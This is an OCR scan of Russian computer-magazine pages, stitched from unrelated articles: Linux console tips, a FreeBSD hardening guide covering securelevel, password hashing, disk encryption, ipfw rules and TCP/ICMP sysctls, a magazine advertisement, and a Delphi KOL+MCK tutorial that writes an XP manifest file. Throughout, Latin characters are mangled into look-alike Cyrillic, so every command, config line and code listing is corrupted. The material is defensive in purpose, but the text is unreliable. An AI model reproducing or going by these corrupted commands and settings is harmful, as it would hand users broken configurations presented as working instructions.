СОБПЮДПЙТЕ ТИШИНУ в консоли 

Т ебя еще не достал надоедливый писк динамика? Предлагаю 
несколько способов отключения: 

О. Выполни команду «зеНегпл -ЫепдІП О -Ыгец 0 -зіоге» 

О. Добавь в /еіс/іприігс или в -/.іприігс строку «зеі ЬеІІ-зІуІе ѵіз- 
іЫе» 

®. Добавь в /еіс/зсгеепгс или в -/.зсгеепгс строку «ѵЬеІІ оп» 



Теперь по команде «ссі Ііпих» ты попадешь в 
каталог /изг/згс/Ііпих, а по команде «ссі ЬазЬ- 
2.05Ь» - в каталог /изг/зІіаге/сІос/Ьа5Іі-2.05Ь. 

О. Используй функции. Когда необходи- 
мо по одной команде выполнить последова- 
тельность команд, лучше использовать функ- 
ции вместо скриптов. К примеру, добавь эту 
функцию в -/.Ьазіігс, чтобы по команде 1д г 
архивировался требуемый файл/каталог: 



$ ѵі -/.Ьазіігс 



ідг() 

{ 

іГ["$Г И” ]; іііеп 
іаг -гѵГ Шаг $1 
дгір -9 Шаг 
Гі 
} 

®. Если ты заботишься о безопасности, 
добавь в файл ДооІ/.ЬазІігс такую запись: 
«ехроіі ТМОІІТ=300». Теперь рутовый зЬеІІ 
будет умирать после 5 минут (300 секунд) 
бездействия. 

А МЫШИНЫЙ СЕРВЕР 

Как ни странно, но в консоли мышь тоже нужна, 
например, для копирования текста или управле- 
ния некоторыми приложениями (хотя это на лю- 
бителя). Всю работу по управлению мышью в 
консоли выполняет мышиный сервер дрт. Так- 
же в комплект дрт входит небольшое дополне- 
ние под названием дрт-гооі, позволяющее од- 
ним кликом мыши вызывать меню, которое ты 
сам можешь составить. Срт-гооі - это тоже 
сервер, после его запуска по комбинации 
«сігі+клик мыши» будет выскакивать меню, в 
которое по твоему желанию можно занести ста- 
тусную информацию или запуск определенных 
команд, например, монтирование диска или 
подключение к инету. Настройка меню произво- 
дится через конфиг /еіс/д рт - гооі . сопі , ничего 
сложного в настройке дрт-гооі нет, все под- 
робно расписано в тап дрт-гооі. 




Наслаждаемся работой дрт 



А БОЛЬШЕ ИПИ МЕНЬШЕ? 

Как часто ты используешь Іезз? Я думаю, 
очень часто: тап іісопіід, Іезз геасіте, Іезз 
/ѵаг/Іод/теззадез. Естественно, так часто ис- 
пользуемая программа должна быть соответ- 
ствующим образом настроена. Предлагаю 
твоему вниманию несколько интересных 
флагов запуска: 

-с при страничной перемотке перерисо- 
вывать экран вместо построчной перемотки; 

-е автоматически выходить при заверше- 
нии файла; 

-Р автоматически выходить, если содер- 
жимое файла умещается на экране; 

-і игнорировать регистр букв при поиске; 

-М показывать наиболее полную инфор- 
мацию о файле в статусной строке; 

-Ы показывать номера строк (иногда бы- 
вает необходимо); 

-г обрабатывать управляющие последова- 
тельности; 

-з замещать несколько пустых строк од- 
ной. 

Чтобы не набивать все эти опции при 
каждом запуске Іезз, просто добавь эти 
строчки в -/.Ьазіігс: 

ехрогі РА6ЕК- 1е$$' 

ехрогі ІЕЗЗ- -с -е -Е -і -М -$ -г' 

Также можно вручную настроить содержа- 
ние статусной строки посредством опции -Р, 
подробности смотри в разделе РРОМРТЗ 
справочной страницы Іезз. 

А МСОІІТ 

Это, конечно же, не все, что можно расска- 
зать об улучшении жизни в консоли, но ты дер- 
жишь в руках журнал, а не книгу. Напоследок 
хочу напомнить, что командная строка ІІІМІХ - 
очень мощное и удобное средство, а иксы - это 
только средство запуска графических приложе- 
ний, причем не самое лучшее ;). 
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П так, ты решил построить сервер на базе ГгееВбП. Хороший выбор. Однако любой сервер является лакомым кусочком для хакера, 
и даже не стоит сомневаться в том, что рано или поздно он подвергнется атаке. Поэтому в первую очередь стоит заняться не 
настройкой различных сервисов, а защитой системы от взлома. Конечно, в системе, установленной с настройками по умолчанию, 
защита находится на достаточном уровне. Однако мы можем сделать наш сервер настоящим крепким орешком. Ну что, начнем строить 
защиту своей РгееВЗП-системы? 



ІКЕЕВ80: ТОР 8ЕС11КІТѴ 



к. 



А КОНСОЛЬНЫЕ ТВИКИ 




К ак известно, загрузившись в 
однопользовательском режи- 
ме, можно изменить пароль 
суперпользователя. Нам сле- 
дует устранить эту досадную 
недоработку. Отредактируем 
файл /еіс/йуз таким образом, 
чтобы при загрузке с опцией 
Ьооі -5 система запрашивала пароль 



назначим эти права как следует. На некото- 
рые системные файлы стоит установить та- 
кие флаги доступа, чтобы они были доступ- 
ны только суперпользователю. Вот пример- 
ный список: 

# сішкні 700 /гооі 

# ссі /еіс 

# сіітосі 600 $у$1од.сопТ гс.сопТ пеѵѵ$у$Іод.сопЕ ііо$і$.аІІ(ш 

Іодіп.сопТ 



Меѵ/аМ /и$г/Ітоте иТ$ гѵѵ,по$иісІ 2 2 

Утилита зиісісопігоі (ѵѵѵѵѵѵ.ѵѵа(зоп.огдЛЬ$сІ-ІіагсІеп- 
іпд/$иігісопігоШтІ) поможет установить пра- 
вильную политику в отношении зиісі/здісі- 
файлов в системе. 

Чтобы при загрузке удалялось содержи- 
мое каталога Дтр, добавляем в /еІс/гс.сопТ 
строку 



сопзоіе попе ипкпоѵѵп ой іпзесиге 

Также следует запретить прямой вход с 
консоли пользователя гооі Для этого в том 
же файле нужно сменить статус консоли на 
іпзесиге. Вот пример для нулевой консоли: 

КуѵО "Мг/ІіЬехес/деііу Рс" соп$25 оп іпзесиге 

Для того чтобы только пользователь гооі 
мог видеть все запущенные процессы, до- 
бавь в /еіс/зузсіі.сопі следующую запись: 

кегп.р$_$ІимаІІргос$=0 

А ваши права? 

Права доступа к файлам - одна из отличи- 
тельных особенностей ШХ-систем. Давай 



Некоторые системные файлы стоит защи- 
тить даже от суперпользователя. Для этого 
существуют модификационные флаги, уста- 
новить которые можно командой сМТІадз. К 
ним относятся флаг аррпсі, который перево- 
дит файл в режим добавления данных, и 
флаг сіід, делающий файл изменяемым 
только для пользователя гооі. Подробности 
по использованию этой команды можно про- 
честь на странице руководства, посвященно- 
го сМІадз (тап сМІадз). 

Файловую систему с пользовательскими 
каталогами лучше смонтировать с парамет- 
ром -позиісі, который игнорирует зиісі-биты 
на файлах. Вот пример строчки из /еІс/ЫаЬ, 
монтирующий /изг/Моте с флагом позиісі 
(побеѵ здесь также не помешает - 
прим.ред.): 



сІеаг_ітр_епаЫе="ѴЕ$" 

А УРОВНИ ЗПЩИТЫ ЯДРО 

Ядро РгееВЗО может работать на нескольких 
уровнях защиты (зесигеіеѵеі). Значение этого 
уровня варьируется от -1 до 3. Для нас инте- 
ресны последние три режима. В режиме 1 
(безопасный режим) нельзя снимать моди- 
фикационные флаги с файлов, а смонтиро- 
ванные дисковые устройства и файлы уст- 
ройств /беѵ/тет, /беѵ/ктет не могут быть 
открыты для записи. В режиме 2 (режим по- 
вышенной безопасности), в дополнение к 
предыдущему, запрещена прямая запись на 
диски, независимо от того, смонтированы 
они или нет. В режиме 3 (режим безопас- 
ности сети), кроме ограничений второго ре- 
жима, запрещено изменение правил файр- 



ііб 




ДЕПОЕИ ГВЕЕВ80 БЕ30П0СН0Й 



волов и ограничений скорости канала. Для 
включения уровней защиты следует доба- 
вить в /еіс/гс.сопі строки 

кегп_$есигеІеѵеІ_епаЫе="УЕ5" 

кегп_$есигеІеѵеІ="2" 

Текущий уровень защиты можно посмот- 
реть командой 

$ $у$сіІ кегпжигеіеѵеі 

А повысить его без перезагрузки - 



II заменяем алгоритм шифрования на ВІоѵѵТі$Іі 
:ра$$ѵѵ(Ногтаі=ЫТ:\ 

II устанавливаем период устаревания паролей 
:ра$$ѵѵогсШте=52(]:\ 

II предупреждаем о том, что пароли должны содержать раз- 
ные символы 
:тіхра$$ѵѵог(]са$е=Ігие:\ 

//задаем минимальную длину пароля 
:тіпра$$ѵѵогс1Іеп=9:\ 

Теперь обновляем базу (Іодіп.сопТбЬ): 

# сар_ліЫЬ /еіс/Іодіп.соп! 




# $у$сіІ -и кегл.$есигеІеѵеІ=2 



Отмечу, что при уровне защиты 1 или вы- 
ше пересобрать изегіапсі и ядро тебе не 
удастся, поскольку на важных системных 
файлах стоят модификационные флаги. 



Л МЕНЯЕМ ППГОРИТМ 

шифрования 



Проверим, получилось ли у нас. Посмотри 
содержимое /еіс/тазіег.раззѵѵсі. Если за- 
шифрованный пароль теперь начинается с 
«$2», все ОК. Осталось сделать так, чтобы 
пароли новых пользователей шифровались 
алгоритмом ВІоѵѵйзІі. Редактируем файл 
/еіс/аиііі.сопі: 

сгурШаиІі=Ш 



Заменим алгоритм шифрования паролей с 
тсІ5 на еще более надежный ВІоѵѵЕізІі. Дела- 
ем исправления в файле /еіс/Іодіп.сопі в 
секции беіаиіі: 



А шифруем Файловую 

СИСТЕМУ 

Файлы, которые могут представлять интерес 
для взломщиков, надежнее всего зашифро- 
вать. Нет, не думай, 
что я опять буду 
рассказывать про 
РСР. Для создания 
зашифрованных 
дисков можно обой- 
тись стандартными 
средствами 
РгееВЗО - СЕОМ и 
ВОЕ. Что такое 
ОЕОМ? Это новая 
система работы с 
дисками, появивша- 
яся в 5-й ветке 
РгееВЗО. Благодаря 
своей модульной 
структуре, она поз- 
воляет делать с 
файловой системой 
все что угодно. Нас 
интересует один из 
ее модулей - ВОЕ 
(Ыоск беѵісе епсгур- 
ііоп) - поддержка 
шифрования файло- 
вой системы. Для 
начала добавим 
в ядро опцию 



орііопз 6Е0ІШЕ 




Делаем консоли безопасными 




СИСТЕМП БЕ30ПРСН0СТИ ТѴШ8ТЕРВ80 МЯС 

В РгееВЗО 5 появилась новая система безопасности ядра, 
ТгизіесІВЗО МАО Ргаплеѵѵогк. МАО расшифровывается как 
Мапсіаіогу Ассезз СопігоІ - принудительный контроль доступа. 
Система МАО с помощью установки так называемых меток на 
различные компоненты системы ограничивает доступ к ним на 
основе созданных администратором политик. РІапример, с по- 
мощью МАО вполне реально создать систему контроля доступа 
к файловой системе, аналогичной файрволу ірТѵѵ, разграничить 
видимость процессов и многое другое. Если тебя заинтересо- 
вала эта тема, обратись к соответствующему разделу РгееВЗО 
РІапсІВоок, а также страницам руководства (плап 4 глас). 



Создадим новый каталог, в котором будут 
лежать конфиги СВОЕ: 

# тМіг /еіс/дМе 

Инициализируем зашифрованный диск: 

# дМе іпіі Меѵ/а(І4$1с -і -I /еіс/дМе/асМзІс 

Откроется редактор, в котором можно 
указать различные настройки. Для файловых 
систем ІІР51 и ІІР32, используемых в 
РгееВЗО, следует указать значение перемен- 
ной зесіогзііе равным 2048. Не забудь выб- 
рать хороший пароль для доступа к диску. 
Подключаем диск: 

# дЫе айасіі Меѵ/асІ4$1с -I /еіс/дЬ(1е/а(14$1с 

Система попросит ввести ключевую фразу 
для доступа к зашифрованному диску. Те- 
перь содержимое этого диска доступно при 
обращении к файлу устройства 
/сІеѵ/асМзІс.ЬсІе. Создадим на нем новую 
файловую систему и монтируем его: 

# пеѵѵіз -Я -02 /(Іеѵ/а(14$1с.Ьс1е 

# тоипі /сІеѵ/асІ4$1с.ЬсІе /тпі 

Теперь можно работать с содержимым за- 
шифрованного диска. Обрати внимание, что 
скорость файловых операций с зашифрован- 
ными разделами почти в 4 раза ниже, чем 
при работе с обычными дисками. Если ты 
пользуешься утилитой зузіпзіаІІ, имей в ви- 
ду, что она несовместима с зашифрованны- 
ми разделами и их нужно отключать перед 
запуском этой утилиты. Также заметь, что 
зашифрованные диски невозможно подклю- 
чать автоматически из /еіс/ізіаЬ, потому не 
стоит применять шифрование к системным 
разделам (/, /изг, /ѵаг). 

По окончании работы с зашифрованным 
разделом размонтируем устройство и отклю- 
чим шифрованный диск: 
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орііопз ІРГІКЕѴАИ.ѴЕКВ08Е 

# шлоилі /(1еѵ/а(]4$1с.Ь(]е 

# дЬбе беіасб /беѵ/аб4$1с После чего добавить в /еіс/гс.сопі строки 



А 1Р-ПР0Т0К0ПЫ 

Теперь займемся защитой от атак, связанных 
с недостатками протокола ТСР/ІР. Начнем с 
фильтрации ЗУИРІ N1- пакетов. Это ТСР-пакеты 
с одновременно установленными флагами 
начала и завершения соединения, пользы от 
них практически никакой, зато они часто ис- 
пользуются при хакерских атаках. Одновре- 
менно займемся ІСМР-протоколом и вклю- 
чим в ядро еще парочку полезных опций: 

II ох уж эти ШШ-пакеты 
орііопз ТСР_0Р0Р_$Ѵ№Ш 

II ограничиваем количество ІСМР-ответов, что помогает при 
защите от 0о$ атак 



орііопз ІСМР.ВАМШ 

II генерируем случайный идентификатор ІР-пакетов 
орііопз ВАШМ_ІР_Ш 
II блокируем Ш-лакеты 
орііопз ТСР_КЕ$ТКЩ$Т 

Но этого еще недостаточно, добавляем в /еіс/гс.сопі: 

II отбрасываем ШШ-лакеты 
іср_бгор_зупііп="ѴЕ$" 



л Используй $$Н 
для удаленного уп- 
равления серве- 
ром, иначе никакие 
рекомендации по 
безопасности тебе 
не помогут. Никог- 
да не пользуйся 
Іеіпеі для удален- 
ного доступа. 




а игал/ѵ.ігееЬзсІ.огд/ 

(іос/еп_и5. 1508859 

-1/Ьоокз/ііапсІ- 

Ьоок/$есигіІу.ІіІтІ 

а ѵшѵѵ.ігееЬзсІ.огд/ 

веси гііу/зеси гііу . Иіт I 

а ш/ѵѵ.шізоп.огд/ 

іЬзсі-ІіагсІепіпд/ 

Аѵіті.апІюШпе. 

сот/сІеѵіаІіоп/ЬзсІ. 

ЫтІ 

а сіеісопі .огд/ИІтІ/ 
Зесигііу/Зесиге- 
Оиісіе/зесиге- 
диібе.іііті 



II отключаем прием и отправку переадресовывающих ІСМР- 
пакетов 

істр_бгор_гебігесі="ѴЕ$" 

II в системном журнале регистрируем переадресовывающие 

ІСМР-пакеты 

істр_Іод_гебігесі="ѴЕ$" 

II предотвращаем зргілдЬоагбілд и зпшгі-атаки 
істр_ЬтсазіесІіо="М0" 

Далее прописываем в /еіс/зузсіі.сопі 
строчки 

пеі.іпеі.іср.ЫаскіюІе=2 

пеі.іпеі.ибр.ЫаскіюІе=1 

С помощью этих переменных мы превра- 
щаем нашу систему в так называемую чер- 
ную дыру. Отныне она не будет реагировать 
на пакеты, поступающие на закрытые порты, 
и они будут просто пропадать. Этот прием 
позволяет защититься от флуда и от скрыто- 
го сканирования портов. 

А ОГНЕННОЯ СТЕНО 

Естественно, без фильтрации сетевого тра- 
фика нам не обойтись. Встроенный файрвол 
іріѵѵ позволит нам фильтровать пакеты по за- 
данным критериям и вести учет. Для того 
чтобы включить файрвол, нужно добавить в 
ядро вот эти опции: 

орііопз ІРЕІВЕШ 




іігеѵѵаІІ_епаЫе="УЕ5" 

іігеѵѵаІІ_іуре="ореп" 

Однако тип файрвола «ореп» подходит 
для чего угодно, но только не для защищен- 
ного сервера. Поэтому для более надежной 
защиты можно выбрать одну из стандартных 
конфигураций: 

II защита только сервера 
іігеѵѵаіі.іуре-'сііепі" 

II защита сервера и локальной сети 
іігеѵѵаІІ_іуре="зітрІе" 

или же написать свой файл с правилами 
файрвола. Немного разберемся с созданием 
правил. Общий формат правила іріѵѵ такой: 

<действие> <протокол> ігот <откуда> іо <куда> дополнитель- 
ные условия> 

В качестве выполняемого действия файр- 
вол может разрешить (аііоѵѵ, разз, ассері, рег- 
тіі) прохождение пакета или запретить (сіепу, 
сігор, геіесі) его, а также посчитать (соипі), 
перенаправить по нужному адресу (іѵѵсі, іог- 
ѵѵагсі) или другой программе (біѵеіі). Протоко- 
лы могут быть ір или аІІ (для всех протоколов 
стека ТСР/ІР), а также іср, исір, істр и т.п. 

Формат поля источника (Тгот) и приемни- 
ка До) пакета может быть записан в различ- 
ных формах: доменное имя, ір-адрес, под- 
сеть в формате ІР:МА8К 
(192.168.1.0:255.255.255.0) или ІР/ЬЕМОТН 
(192.168.1 .0/24), а также в виде специально- 
го слова апу (любой адрес) или те (все ад- 
реса локальной машины). Для іср и ибр-про- 
токола после адреса источника или прием- 
ника можно через пробел указать еще и 
порт. И наконец, из дополнительных условий 
самыми полезными являются направление 
пакета (іп или оиі - входящий и исходящий 
соответственно), интерфейс, через который 
будет проходить пакет (например, ѵіа іхрО), 
и даже идентификатор пользователя (иіб) 
или группы (діб), для которых это правило 
будет работать. Теперь не составит труда 
разобраться, что правило 

белу іср ігот апу іо 192.168.1.0/24 іп ѵіа іхрО 

запрещает прохождение любых входящих 
іср-пакетов через интерфейс ЬсрО к сети 
192.168.1.0/24, а правило 

соипі ір ігот 192.168.1.0/24 іо те иіб 1001 

будет вести учет трафика, который полу- 
чит из сети 192.168.1 .0/24 пользователь с 
ІІЮ, равным 1001. 

Каждое правило файрвола должно иметь 
свой уникальный номер. Правила проверя- 
ются в порядке возрастания своих номеров. 
Для управления файрволом существует ко- 
манда іріѵѵ. Чтобы добавить правило, вос- 
пользуйся командой 

# ірЕѵѵ абб <номер> <правило> 

а чтобы его удалить: 



# ірТи беіеіе <номер> 

Для просмотра списка правил есть коман- 
да ірілл/ Іізі, а іріѵѵ зііоѵѵ покажет трафик и ко- 
личество пакетов, обработанных каждым из 
правил. В качестве примера для настройки 
файрвола можно посмотреть файл 
/еІ:с/гс . Ті геѵѵаі I , а также ознакомиться с руко- 
водством по іріѵѵ. Напоследок добавим в 
/еіс/гс.сопі строчку 

Іод_іп_ѵаіл="УЕ$" 

Теперь все попытки подключения к закры- 
тым портам твоего сервера будут занесены в 
логи. 

А ДЕИ0Н0В - ПОД КОНТРОЛЬ 

Не ко всем службам, запущенным на твоем 
сервере, стоит давать доступ. Если заблоки- 
ровать доступ к отдельным портам можно с 
помощью правильной настройки файрвола, 
то доступ к службам проще ограничить с по- 
мощью файла /еіс/іюзіз.аііоѵѵ. Для примера 
ограничим доступ по ззб только несколькими 
сетями: 

# ѵі /еіс/Ііо$і$.аІІоѵѵ 

$$ііб : ІосаІІіозі : аііоѵѵ 

кМ: 192.168.1.: аііоѵѵ 

$$ііб : 10.1.1.0/255.255.255.240 : аііоѵѵ 

$$ііб : АН : белу 

Формат файла, как видишь, достаточно 
простой. Сначала мы указываем имя служ- 
бы, затем имя или адрес хоста или сети, за- 
тем действие. Правило АН указывает, как 
поступать в случаях, не предусмотренных 
предыдущими правилами. 

Теперь займемся демоном іпеісі, который 
играет весьма важную роль в обеспечении 
безопасности системы. Через него работают 
іеіпеіб, іірб, іаік и прочие службы. Если ни- 
какие из демонов, запускаемых из іпеісі, те- 
бе не нужны, отключи его. Для этого надо 
указать в /еіс/гс.сопі: 

іпеіб_епаЫе=10" 

Если тебе все же нужен іпеісі и службы, 
которые запускаются из него, то стоит вклю- 
чить протоколирование событий и при боль- 
шой нагрузке увеличить количество одновре- 
менных обращений к іпеісі (по умолчанию 
это число равно 256). Для этого добавь в 
/еіс/гс.сопі строчку 

іпеіб_іІад$="-І -К 1024" 

А ПОСЛЕДНИЕ ШТРИХИ 

Вот мы и закончили, все изменения в конфигу- 
рационные файлы внесены, настройки сдела- 
ны. Осталось пересобрать ядро и перезагру- 
зить систему. Посмотрим, чего мы добились. 

$ пеізіаі -па | дгер 1.Ш 

Эта команда покажет нам, на каких пор- 
тах висят сервисы. Чем их меньше, тем 
лучше. Также попробуй просканить свою 
машину птар'ом. Итак, теперь твоя систе- 
ма намного более защищена, чем раньше. 
Не забывай регулярно обновлять ее и сле- 
дить за логами. Удачи! ЗС 
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'«□VI) ЭКСПЕРТ* - журнал о техники для домашнего кинотеатра 
ёиомѳсйчный, тйнцрвый журнал 112 полос 



□ѴЕМиіеоры, ресиверы, акустика, проекторы, телевизоры и другие 
компоненты домашнего кинотеатра - сравнительное тестирование 
наиболее интересных аппаратов на се«дчА. Полнота океана веек 
модельныя рядов при сохранении актуальности и новизны мате- 
риалов Информаций о ценах и рекомендуемыя местах покупки 
Тесты, обзоры. новости технологий, советы профессионалов. Как 
установить технику и как «уложиться в бюджет» Журнал написан 
простым и понятным каждому языком Приложений * каждому 
номеру «СѴО Эксперт» - ОѴО о фильмом. 








качестве способов нининизации я всегда предлагал использовать специальные проги для сжатия запускных файлов или 
отказываться от визуальности. Первый способ хорош, но файлы все же остаются достаточно большими. Во втором случае файлы 
становятся минимальных размеров, но теряют визуальность, а в заднице появляется большая заноза. Но есть способ создать 
действительно маленький код и практически не потерять в визуальности. 
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А коыгск 

К ОІ_ (Кеу ОЬіесІз ШЬгагу, или 
библиотека ключевых объек- 
тов) содержит объекты, кото- 
рые упрощают программиро- 
вание на ѴѴіпсІоѵѵз АРІ и при 
этом не увеличивают код. 
МСК (Міггог СІаззез Кф или 
комплект зеркальных классов) 
- библиотека, позволяющая использовать 
КОІ_ визуально. Это отличная надстройка, 
которая максимально эффективно использу- 
ет возможности КОІ_ и при этом минимально 
влияет на размер исполняемого файла. 

Так как визуальная среда Эеірііі плохо под- 
ходит для создания компактного кода и боль- 
ше ориентирована на использование родных 
библиотек ѴСІ_ и СІ_Х, то при создании визу- 
альности с использованием К01_ разработчи- 
кам пришлось неплохо попотеть. Конечно же, 
реализация получилась немного неуклюжей 
(чуть позже мы увидим все недостатки), но 
другого выхода я не вижу и даже за такое ре- 
шение готов поставить ребятам памятник и 
выдать медаль из консервной банки :). 



А ІИ8ТПИ.МЕ 

Установка проста, как три копейки. Разархи- 
вируем содержимое архивов коі.іір и тск.іір 
в одну и ту же директорию. Теперь открыва- 
ем файл МіггогКОІ-РаскадеОХ.сІрк, где X - 
это номер версии твоего дельфина. У меня 



7-я версия, но даже при установке файла 
для 6-й версии библиотека ставится без 
проблем. Итак, после открытия файла перед 
нами откроется окно установки пакета (см. 
рис. 1 ). Нажимаем здесь ОК и ждем секунду 
до окончания установки пакета. 

После установки пакета нам становится 
доступной новая закладка КОІ_. Здесь распо- 
ложены зеркальные компоненты для основ- 
ных компонентов Эеірііі. Чтобы код был ком- 
пактным, нужно использовать именно их. Но 
перед этим нужно правильно создать проект. 




А НЕііо мгавю 

Чтобы создать проект КОИ-МСК, нужно вы- 
полнить несколько нехитрых операций. На 
первый взгляд они глупы и непонятны, но 
потом привыкаешь. Для начала создаем 
стандартный проект ЭеІрЫ простого прило- 
жения и сохраняем все файлы проекта в од- 
ной директории. Помни, что все файлы 
должны быть в одной и той же директории, 
и разбрасывать их по разным папкам неже- 
лательно. При сохранении проекта его наз- 
вание не имеет значения, потому что запус- 
кающий файл будет иметь другое имя. 

Теперь бросаем на форму компонент 
КОІ_РгоіесІ и в свойстве ргоіесЮезІ пишем 
осмысленное название - имя запускающего 
файла и всего проекта в целом. Да-да, мы 
его еще только создаем. Давай укажем здесь 
название ТезІРгоіесІ. 

Теперь бросаем на форму компонент 
КОІ_Рогт. Это говорит о том, что у нас будет 
визуальная форма. Сохраняем все. 

Загляни сейчас в директорию, где сохра- 
нялся проект. Обрати внимание, что здесь по- 
явилась куча файлов с расширением .іпс и но- 
вый файл проекта с именем, которое мы ука- 
зали в свойстве ргоіесЮезі компонента 
КОІ_Ргоіесі, и расширением .сірг. В данном 



- ■ *~П,. іігіі- ГБ. * 

Рисунок 2. Компоненты МСК 
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МППЕНЬКИЙ ГИГОНТ БОЛЬШОГО ИНТЕРФЕЙСО 



ЛИСТИНГ 1. 

код патчинга 



ргосесіиге ТРогт1.ВиЙоп1СІіск($еп(1ег: РОЬі); 
ѵаг 

$ : $ігіпд; 

ШхіРіІе; 

Ьедіп 

А$$ідпРіІе(Р, ЕШШохІ.Техі+'.тапіРезі'); 

Реѵѵгііе(Г); 

5:='<?хтІ ѵег5іоп="1.0" епсоШпд- 'ІЛР-8" $іапсІ- 
аІопе="уе$"?> ,+ #13#10+ 

'<а$$етЬІу хтІп$="игп:$сІіета$-тісго$оР1- 

сот:а$т.ѵГ шп#е$іѴег$іоп-'1.0''>'+#13#10+ 

'<а$$етЫуІ(1епШу'+#13#10+ 

'ѵег$іоп="1.0.0.0"'+#13#10+ 

'ргосе$$огАгсЬііесіиге-'Х86'''+#13#10+ 

'пате="Місго$оЕШіп(1оѵѵ$.Ргодгат"' + й13й10 + 

'Іуре="ілііп32'"+#13#10+ 

'/>'+#13#10+ 

'<(1е$сгірііоп>Уоиг арр Ье$сгірііоп Ьеге<Ме$сгір- 
ііоп>'+#13#10+ 

, <с!ереп(]епсу> , +#13#10+ 

’<сІереп(]епіА$$етЫу> , +#13#10+ 

'<а$$етЫуІ(1епШу'+#13#10+ 

'Іуре="ѵѵіп32'"+#Ш10+ 

'пате="Місго$оР1.ѴѴіпс1оѵѵ$.Соттоп- 

СОПІГОІ$'"+#13#10+ 

'ѵег$іоп="6.0.0.0'"+#13#10+ 

'ргосе$$огАгсЬііесіиге-'Х86'''+#13#10+ 

'риЫісКеуТокеп="6595Ь64144ссР1(]Р" ,+ #13#10+ 

'Іапдиаде="*'"+#13#10+ 

'/>'+#13410+ 

’</сІерепсІепіА$$етЫу>'+#13#10+ 

'</сІерепсІепсу>'+#13#10+ 

'</а$$етЫу>'; 
ѵѵгііеІп(І, $); 

СІозеРіІе(Г); 

епЬ; 



ные действия и компиляция должны проис- 
ходить в автоматически созданном проекте 
ТезІРгоіесІ.сІрг. 

Итак, открой созданный проект и откомпи- 
лируй его. Посмотри на размер полученного 
запускающего файла. Если пустой ѴСЬпро- 
ект занимает намного больше 200 кило, то 
КОЬ+МСК у меня занял чуть более 23 кило. 

Теперь можно визуально расставлять на 
форме компоненты с закладки КОІ_ и ис- 
пользовать привычным образом. При этом 
размер файла будет увеличиваться очень 
медленно, пока ты не подключишь какой-ни- 
будь заголовочный файл из состава ѴСІ_ и он 
не потянет паровозом в екзешник всякую не- 
нужную чушь. 

Л ГЕНЕРИИ ФОРМУ 

Мы с редактором долго решали, какой при- 
мер использовать для иллюстрации возмож- 
ностей КОЬ+МСК, и никак не могли выбрать. 
Но тут я вспомнил одну маленькую утилиту, 
которая вышла с появлением ѴѴіпсІоѵѵз ХР и 
которая умела заставлять проги отображать- 
ся в стиле ХР, даже если это не было в них 
заложено. Сейчас я покажу, как эта прога 
работает. 

На форме нам понадобятся две кнопки 
КОІ_ВиНоп и поле ввода КОІ_ЕсІіШох. По на- 
жатии первой кнопки будет отображаться ок- 
но выбора файла, а его имя будет попадать 
в поле ввода. Для отображения окна выбора 
файла на форму надо поместить и компо- 
нент КОІЮрепЗаѵеОіаІод. 

Итак, для первой кнопки пишем код: 



ЛИСТИНГ 2. 

содержимое Фойла 

ИПНИФЕСТП 



файла 



ргосесіиге ТРогт1.Виііоп2СІіск($еп(1ег: РОЬі); 
Ьедіп 

\\ ОрепЗаѵеЛіаІодІ.Ехесиіе ІЬеп 

Е(1ііВох1.Техі:=0репЗаѵе0іаІод1.РіІепапіе: 

епЬ; 




(#в*я! 

Пигч 



Рисунок 3. Форма будущей программы 



А88ідпРіІе(ТіІе, пате) - связать имя 
файла пате с переменной Тііе. 

НеѵѵгіІе(ТіІе) - создать заранее связан- 
ный с переменной Гііе файл. 

Ве8еІ(ЛІе) - открыть связанный с пере- 
менной Тііе файл. Такой файл уже должен 
существовать. 

ѴѴгііеІп(ТіІе, зіг) - записать в файл стро- 
ку зіг. 

ВеасИп(ЛІе, зіг) - если файл открыт для 
чтения, то этой функцией можно прочитать 
строку. 

СІозеРіІе(ТіІе) - закрыть указанный файл. 

Л логика 

Несмотря на то, что файл манифеста состо- 
ит из множества строк, мы сохраняем все в 
один заход. Для этого подготавливается пе- 
ременная з типа Зігіпд, которая содержит 
все строки и переводы каретки, и одним вы- 
зовом функции ѵѵгйеіп содержимое строки 
записывается в файл. 

Диск - это одно из слабых мест современ- 
ного компьютера, потому что это механика, 
а не электроника. Старайтесь всегда опти- 
мизировать доступ к файлам и читать или 
записывать данные большими блоками. 

Если не понравилось, как программа выг- 
лядит или работает в ХР-шном стиле, то мож- 
но все вернуть на родину, удалив файл мани- 
феста. Для этого в программе добавим кноп- 
ку, по нажатии которой произойдет удаление: 

0еІеіеРіІе(РСЬаг(ЕсІііВох1.Техі+'.тапіІе$П): 



Ч3*> 

л На компакт-дис- 
ке лежат полные 
исходные коды 
программы и биб- 
лиотеки. 




Дополнительную 
инфу смотри на: 
л Шр://Ьопап2а5. 
гіпеі. ш/е_ко1тсШт 
а коі.тазіак.ги 
а пиіі.ѵѵаіізі.ги/коі/ 




А С ПОМОЩЬЮ 

КОЬ+МСК удобно 
создавать шуточ- 
ные программы 
(западло), требую- 
щие визуального 
интерфейса. 



<?хтІ ѵег$іоп="1.0" епсосІіпд="ІЛР-8" $іагк1- 
аІопе="уе$"?> 

<а$$етЫу хтІп$="игп:$сІіета$-тісго$оГІ- 

сот:а$т.ѵ1" тап#е$іѴег$іоп="1.0"> 

<а$$етЫуІ(1епШу 

ѵег$іоп="1.0.0.0" 

ргосе$$огАгсЬііесіиге="Х86" 

пате="Місго$оЕШп(1оѵѵ$.Ргодга[п" 

іуре="ѵѵіп32" 

> 

<Ье$сгірііоп>Ѵоиг арр Ье$сгірііоп Ьеге</(1е$сгірііоп> 
<Ьереп(1епсу> 

<Ьереп(1епіА$$етЫу> 

<а$$етЫуІсІепШу 

іуре="ѵѵіп32" 

пате="Місго$оЕШп(1оѵѵ$.Сопітоп-СопігоІ$" 

ѵег$іоп="6.0.0.0" 

ргосе$$огАгсЬііесіиге="Х86" 

риЫісКеуТокеп="6595Ь64144ссМ" 

Іапдиаде="*" 

/> 

<Мерегк1епіА$$етЫу> 

<Мереп(1епсу> 

</а$$етЫу> 



случае это будет ТезІРгоіесіфг. Это и есть 
проект МСК, который нужно открывать и визу- 
ально работать, как с любым другим проектом. 

Приложение, которое мы создали пер- 
вым, можно закрыть и больше уже не откры- 
вать. Оно нужно только для размещения 
файлов КОІ_РгоіесІ и КОІ_Рогт. Все осталь- 



Пользователь должен будет только выб- 
рать запускающий файл программы, кото- 
рую нужно пропатчить. По нажатии второй 
кнопки должен быть создан файл манифеста 
ѴѴіпсІоѵѵз с таким же именем, как у исполняе- 
мого файла, и добавлено расширение .тапі- 
Гезі. Содержимое, которое должно быть в 
файле, можно увидеть в листинге 2, а код 
патчинга показан в листинге 1 . 

